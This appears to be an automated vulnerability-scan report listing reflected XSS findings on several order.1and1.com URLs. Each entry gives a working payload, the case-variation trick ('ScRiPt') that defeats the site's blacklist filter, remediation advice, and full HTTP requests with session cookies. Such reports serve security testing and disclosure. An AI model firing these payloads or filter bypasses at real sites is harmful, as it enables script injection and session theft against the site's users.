This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request 1
GET /xml/order/Hosting2a1d6</ScRiPt%20><x%20style%3dx%3aexpression(alert(1))>596a15d5308;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1 Host: order.1and1.com Proxy-Connection: keep-alive Referer: http://order.1and1.com/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642626825 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; UT=8Z1wsLzAmT09mYHNpcDZuaDUnMWpdVy9GOTMbHxwcGzAyMC0tMC8pLDAjJSQjIEUzX1RWZBweMGA5Y3I4KywoJywoJiknISkgHyhgYSczOmpzOSwtKSgtKicqJSgpIiM=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:6:AAABLtRX2K_J5jNaUkl1B0HVVvj*yNyZ:1300642650287; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10
Request 2
GET /xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1 Host: order.1and1.com Proxy-Connection: keep-alive Referer: http://order.1and1.com/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642626825 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; UT=8Z1wsLzAmT09mYHNpcDZuaDUnMWpdVy9GOTMbHxwcGzAyMC0tMC8pLDAjJSQjIEUzX1RWZBweMGA5Y3I4KywoJywoJiknISkgHyhgYSczOmpzOSwtKSgtKicqJSgpIiM=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:6:AAABLtRX2K_J5jNaUkl1B0HVVvj*yNyZ:1300642650287; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10
The value of REST URL parameter 3 submitted to the URL /xml/order/Hosting is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Hosting. The payload af2f1</ScRiPt%20>54b667825a6 was submitted in the REST URL parameter 3. This input was returned as af2f1</ScRiPt >54b667825a6 in a subsequent request for the URL /xml/order/Hosting.
This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
The value of REST URL parameter 3 submitted to the URL /xml/order/Hosting is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Hosting. The payload f884f</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>89d857b9fc1 was submitted in the REST URL parameter 3. This input was returned as f884f</ScRiPt ><ScRiPt>alert(1)</ScRiPt>89d857b9fc1 in a subsequent request for the URL /xml/order/Hosting.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
The value of REST URL parameter 3 submitted to the URL /xml/order/Instant is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Instant. The payload 92e84</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>9555bc59727 was submitted in the REST URL parameter 3. This input was returned as 92e84</ScRiPt ><ScRiPt>alert(1)</ScRiPt>9555bc59727 in a subsequent request for the URL /xml/order/Instant.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request 1
GET /xml/order/Instant92e84</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>9555bc59727;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domains HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domains HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/MailInstantMail is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/MailInstantMail. The payload 17be3</ScRiPt%20>4a6827ab2d was submitted in the REST URL parameter 3. This input was returned as 17be3</ScRiPt >4a6827ab2d in a subsequent request for the URL /xml/order/MailInstantMail.
This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request 1
GET /xml/order/MailInstantMail17be3</ScRiPt%20>4a6827ab2d;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domains HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/MailInstantMail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domains HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/MsHosting is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/MsHosting. The payload 9d4af</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>542f10c1a1e was submitted in the REST URL parameter 3. This input was returned as 9d4af</ScRiPt ><ScRiPt>alert(1)</ScRiPt>542f10c1a1e in a subsequent request for the URL /xml/order/MsHosting.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request 1
GET /xml/order/MsHosting9d4af</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>542f10c1a1e;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.mail HTTP/1.1 Host: order.1and1.com Proxy-Connection: keep-alive Referer: http://order.1and1.com/xml/order/Home;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigbO2t0Oi0uKikuKigrKSMrIiE=; emos1und1d1_jcsid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1:AAABLtO_k22HCyrc0S5Ck_gLCqZigiV2:1300632671085; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1:AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1300632671085:0:false:10
Request 2
GET /xml/order/MsHosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.mail HTTP/1.1 Host: order.1and1.com Proxy-Connection: keep-alive Referer: http://order.1and1.com/xml/order/Home;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigbO2t0Oi0uKikuKigrKSMrIiE=; emos1und1d1_jcsid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1:AAABLtO_k22HCyrc0S5Ck_gLCqZigiV2:1300632671085; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1:AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1300632671085:0:false:10
The value of REST URL parameter 3 submitted to the URL /xml/order/Service is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Service. The payload 2eb97</ScRiPt%20><x%20style%3dx%3aexpression(alert(1))>359b8a2e72d was submitted in the REST URL parameter 3. This input was returned as 2eb97</ScRiPt ><x style=x:expression(alert(1))>359b8a2e72d in a subsequent request for the URL /xml/order/Service.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request 1
GET /xml/order/Service2eb97</ScRiPt%20><x%20style%3dx%3aexpression(alert(1))>359b8a2e72d;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/Service;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/Sharepoint is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Sharepoint. The payload 2f20e</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>1ed21c34ec was submitted in the REST URL parameter 3. This input was returned as 2f20e</ScRiPt ><ScRiPt>alert(1)</ScRiPt>1ed21c34ec in a subsequent request for the URL /xml/order/Sharepoint.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request 1
GET /xml/order/Sharepoint2f20e</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>1ed21c34ec;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.sharepoint HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.sharepoint HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/VirtualServerL is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/VirtualServerL. The payload dddff</ScRiPt%20><img%20src%3da%20onerror%3dalert(1)>d0fee8f5448 was submitted in the REST URL parameter 3. This input was returned as dddff</ScRiPt ><img src=a onerror=alert(1)>d0fee8f5448 in a subsequent request for the URL /xml/order/VirtualServerL.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
The value of REST URL parameter 3 submitted to the URL /xml/order/popupDomainPrices is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/popupDomainPrices. The payload 753b5</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>63529f6639f was submitted in the REST URL parameter 3. This input was returned as 753b5</ScRiPt ><ScRiPt>alert(1)</ScRiPt>63529f6639f in a subsequent request for the URL /xml/order/popupDomainPrices.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request 1
GET /xml/order/popupDomainPrices753b5</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>63529f6639f;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/popupDomainPrices;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
